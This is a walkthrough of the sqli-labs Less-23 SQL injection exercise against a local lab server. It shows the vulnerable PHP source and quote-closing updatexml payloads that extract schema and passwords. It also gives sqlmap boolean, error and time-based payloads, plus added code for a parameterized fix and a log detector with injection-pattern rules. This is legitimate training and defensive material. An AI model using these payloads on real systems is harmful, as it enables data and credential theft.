sqli-lab-less23

1. Target address

Less-23 GET-Error based-strip comments
# Error-based GET injection with the comment markers filtered out
http://127.0.0.1/sqli/less-23/

2. Vulnerability probing

#http://127.0.0.1/sqli/Less-23/index.php?id=1'
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
#From the error we infer the fragment '1'' LIMIT 0,1
#Guessed query: select * from xxx where id='$id' limit 0,1;

3. Source code analysis

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables
if(isset($_GET['id']))
{
    $id=$_GET['id'];

    //filter the comments out so as to comments should not work
    $reg = "/#/";
    // `/` is the opening and closing delimiter of the regular expression.
    // `#` is the character to match, "#".
    $reg1 = "/--/";
    $replace = "";   # replace the comment markers with the empty string ""
    $id = preg_replace($reg, $replace, $id);
    $id = preg_replace($reg1, $replace, $id);
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#0000ff">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}
else { echo "Please input the ID as parameter with numeric value";}

?>
preg_replace(mixed $pattern, mixed $replacement, mixed $subject);
Performs a regular expression search and replace.
$pattern: the pattern to search for, a string or an array of strings
$replacement: the replacement string, or an array of strings
$subject: the target string (or array of strings) to search and replace in

The usual approach is to replace the comment markers with the empty string "".
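The following is an added example, not part of the original post and not sqli-labs code. It reimplements the Less-23 filter (delete every `#` and `--`) in Python over an in-memory SQLite table that stands in for the lab's `security.users` (the rows are constructed), so the two behaviours of the source can be checked side by side: the string-built query is still reachable by a value that closes the quote without any comment marker, while an integer allow-list plus a parameterized query, the fix the lab's own "numeric value" message points at, rejects it before it touches SQL text.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the lab's `security.users` table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")],
    )
    conn.commit()
    return conn


def strip_comments(user_id):
    """The Less-23 filter: preg_replace('/#/') and preg_replace('/--/') with '' as replacement."""
    user_id = re.sub(r"#", "", user_id)
    return re.sub(r"--", "", user_id)


def vulnerable_lookup(conn, user_id):
    """String-built query exactly like the lab's $sql; returns username, None, or 'SQL error'."""
    sql = f"SELECT username FROM users WHERE id='{strip_comments(user_id)}' LIMIT 1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "SQL error"  # the lab prints mysql_error() at this point
    return row[0] if row else None


def safe_lookup(conn, user_id):
    """Allow-list validation plus a parameterized query: the input never becomes SQL text."""
    if not re.fullmatch(r"[0-9]{1,10}", user_id):
        raise ValueError("id must be a positive integer")
    row = conn.execute(
        "SELECT username FROM users WHERE id=? LIMIT 1", (int(user_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1'--", "1' and '1'='1", "1' and '1'='2"]:
        print(f"{value!r:22} vulnerable -> {vulnerable_lookup(db, value)!r}")
    for value in ["2", "1' and '1'='1"]:
        try:
            print(f"{value!r:22} safe       -> {safe_lookup(db, value)!r}")
        except ValueError as err:
            print(f"{value!r:22} safe       -> rejected ({err})")
```

Running it shows the three outcomes the lab page produces: a plain id returns a row, `1'--` loses its `--` and becomes a syntax error, and `1' and '1'='1` passes the filter unchanged and still returns the row, whereas `safe_lookup` rejects everything that is not digits.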

4. Black-box and white-box testing

Because the comment markers are filtered, they cannot be used to close the single quote, so take a different approach:
use or '1'='1 to close the single quote instead.
#Guessed query: select * from xxx where id='$id' limit 0,1;

http://127.0.0.1/sqli/Less-23/index.php?id=1' and '1' = '1
#Result displayed successfully
Using the updatexml error-based function as the example

#Get the database name
http://127.0.0.1/sqli/Less-23/index.php?id=1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '1' = '1

#Get the table name
http://127.0.0.1/sqli/Less-23/index.php?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) and '1' = '1

#Get the column names
http://127.0.0.1/sqli/Less-23/index.php?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) and '1' = '1

#Get the column values
http://127.0.0.1/sqli/Less-23/index.php?id=1' and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) and '1' = '1
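The Less-23 source appends `ID:<value>` to `result.txt` for every request, which gives a defender a ready-made audit trail. As an added example (not part of the original post or of sqli-labs), the script below scans such a log and flags the quote-closing and error/time-based patterns shown above; the log lines are constructed for this example and the rule names are this example's own.

```python
import re

# Constructed sample of the lab's result.txt; none of these lines come from a real capture.
SAMPLE_LOG = "\n".join([
    "ID:1",
    "ID:2",
    "ID:1' and '1' = '1",
    "ID:1' and updatexml(1,concat('~',database(),'~',user()),1) and '1' = '1",
    "ID:1' and (select 3458 from (select(sleep(5)))x) and 'a'='a",
    "ID:abc",
    "ID:1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables "
    "where table_schema='security' limit 0,1)),0) and '1' = '1",
])

# (reason label, pattern). A tautology here means "and/or '<x>' = '" used to re-close the quote.
RULES = [
    ("tautology", re.compile(r"\b(and|or)\s+'[^']*'\s*=\s*'", re.I)),
    ("error-based function", re.compile(r"\b(updatexml|extractvalue)\s*\(|floor\s*\(\s*rand", re.I)),
    ("time-based function", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("subquery", re.compile(r"\bselect\b", re.I)),
]


def parse_log(text):
    """Yield (line_number, id_value) for every 'ID:' line written by the lab's fwrite()."""
    for number, line in enumerate(text.splitlines(), start=1):
        if line.startswith("ID:"):
            yield number, line[3:]


def classify(value):
    """Return the reasons a logged id looks like injection; an empty list means benign."""
    if re.fullmatch(r"\d+", value):
        return []  # exactly what the application expects: a bare integer
    reasons = ["non-numeric id"]
    if "'" in value or '"' in value:
        reasons.append("quote")
    for label, pattern in RULES:
        if pattern.search(value):
            reasons.append(label)
    return reasons


def scan(text):
    """Scan a whole log and return one dict per suspicious line."""
    hits = []
    for number, value in parse_log(text):
        reasons = classify(value)
        if reasons:
            hits.append({"line": number, "value": value, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: {', '.join(hit['reasons'])} :: {hit['value']}")
```

Note that a quote count would not catch these payloads: each one leaves an even number of quotes because the closing quote is supplied by the original query, which is why the rule matches the `and '...' = '` shape instead.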

5. Writing a script

import requests

url = "http://127.0.0.1/sqli/less-23/index.php?id=1"
# Copy the request headers from the browser devtools (F12) or from a Burp Suite capture
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload = "'--+"  # the Less-23 filter strips the "--", so only the quote reaches the query
response = requests.get(url + payload, headers=header)
print(response.text)
# Judge the outcome from what the page echoes back

6. sqlmap

sqlmap -u "http://127.0.0.1/sqli/less-23/index.php?id=1" --batch

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3318=3318 AND 'YUgJ'='YUgJ

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 7840 FROM(SELECT COUNT(*),CONCAT(0x716b6a6a71,(SELECT (ELT(7840=7840,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nvxw'='nvxw

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3458 FROM (SELECT(SLEEP(5)))Amso) AND 'WBdb'='WBdb

7. Summary

1. SQL injection defence method: remove comment characters from the input parameters
2. SQL injection bypass method: based on the guessed statement, use a closing technique that matches the original query